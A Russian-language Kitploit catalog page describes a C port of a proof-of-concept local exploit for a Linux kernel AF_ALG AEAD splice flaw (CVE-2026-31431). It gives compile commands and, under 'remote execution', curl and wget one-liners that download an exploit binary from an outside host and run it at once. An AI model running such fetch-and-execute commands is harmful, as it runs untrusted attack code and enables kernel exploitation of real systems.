Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-31431 — C-порт proof-of-concept, эксплуатирующего уязвимость в логике splice в AF_ALG AEAD ядра Linux (CVE-2026-31431), для образовательных исследований. | Kitploit
Инструменты/GitHubGitHub/offsecguy/cve-2026-31431
Анализ уязвимостейЭксплуатацияЭксплуатация Бинарных Файлов
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

C-порт proof-of-concept, эксплуатирующего уязвимость в логике splice в AF_ALG AEAD ядра Linux (CVE-2026-31431), для образовательных исследований.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

copy.fail — примитив AF_ALG AEAD splice (CVE-2026-31431)

Обзор

Этот проект представляет собой порт на C оригинального прототипа на Python, созданного offsecguy.
Он использует криптографический API ядра Linux (AF_ALG) с применением:

  • режима AEAD authencesn(hmac(sha256),cbc(aes))
  • флага MSG_MORE
  • системного вызова splice()

Методика передаёт данные из файлового дескриптора, доступного только для чтения, через крипто-сокет, обрабатывая их чанк за чанком.


⚙️ Компиляция

Вариант 1 — musl (статическая сборка)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

Вариант 2 — GCC статически

root@kitploit:~
gcc exp.c -o exp -lz -s -static

Вариант 3 — GCC динамически

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 Удалённое выполнение

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ Примечания

  • Требуется поддержка AF_ALG в ядре Linux
  • Используется zlib для декомпрессии
  • Предназначено для низкоуровневого взаимодействия с криптографией ядра и экспериментов

Отказ от ответственности

Этот код предоставлен только для образовательных и исследовательских целей.
Используйте ответственно и только на системах, которые вам разрешено тестировать.

Скачать инструмент